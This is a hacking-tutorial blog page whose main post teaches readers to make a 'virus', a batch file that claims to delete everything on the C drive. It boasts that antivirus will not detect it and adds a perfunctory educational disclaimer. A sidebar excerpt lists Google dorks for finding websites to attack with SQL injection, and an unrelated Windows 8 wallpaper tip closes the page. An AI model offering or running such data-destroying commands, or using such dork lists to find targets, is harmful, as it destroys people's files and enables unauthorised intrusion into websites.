Skip to main content

Learn To Make Dangerous Virus In A Minute

In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.






What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

STEP  1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

STEP  2. Save this file as virus.bat (Name can be anything but .bat is must)
 
STEP 3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.All the stuffs of my blog are only for education purpose please don't misuse it!!!!

Comments

Popular posts from this blog

List of google dorks for sql injection!!!!!

                                       List Of Google Dorks For Sql Injection Google Dork for sql injection I had previously share with you guys List of  good proxy sites to surf anonymously on the internet and today i am sharing with you a list of google dorks for sql injection which is one of most used method to hack a website. List Of Google Dorks inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id=d= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?nu...

Some of my Latest edits for several Societies and Organisations

HOW TO SET CUSTOM IMAGE AS START SCREEN BACKGROUND IN WINDOWS 8

Hey friends, there are a lot of softwares that can do this work. But, we recently shared that how you can make start screen transparent in Windows 8 i.e, one software, many applications.The same software can do change the wallpaper too. How? Here are the steps: Download Windows 8 Start Screen customizer here Now, open the main application, it will look like this: Click on Load Picture  and browse the image you want to set as wallpaper. Now, click Apply & Save and it`s done!!!